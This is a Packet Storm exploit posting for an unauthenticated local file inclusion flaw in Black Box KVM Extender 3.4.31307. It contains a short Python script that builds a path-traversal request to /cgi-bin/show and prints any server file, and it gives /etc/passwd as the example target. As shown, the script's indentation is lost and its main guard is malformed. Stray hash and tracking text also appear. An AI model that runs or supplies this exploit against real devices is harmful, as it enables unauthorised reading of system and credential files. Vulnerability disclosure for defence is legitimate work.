Black Box Kvm Extender version 3.4.31307 suffers from a local file inclusion vulnerability.
7cfcd595717037d50ce7e14141d64bfe83b4a9ecc44ba3dbe53abf5aba78d15d# Exploit Title: Black Box Kvm Extender 3.4.31307 - Local File Inclusion
# Date: 05.07.2021
# Exploit Author: Ferhat Çil
# Vendor Homepage: http://www.blackbox.com/
# Software Link: https://www.blackbox.com/en-us/products/black-box-brand-products/kvm
# Version: 3.4.31307
# Category: Webapps
# Tested on: Linux
# Description: Any user can read files from the server
# without authentication due to an existing LFI in the following path:
# http://target//cgi-bin/show?page=FilePath
import requests
import sys
if name == 'main':
if len(sys.argv) == 3:
url = sys.argv[1]
payload = url + "/cgi-bin/show?page=../../../../../../" + sys.argv[2]
r = requests.get(payload)
print(r.text)
else:
print("Usage: " + sys.argv[0] + ' http://example.com/ /etc/passwd')
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed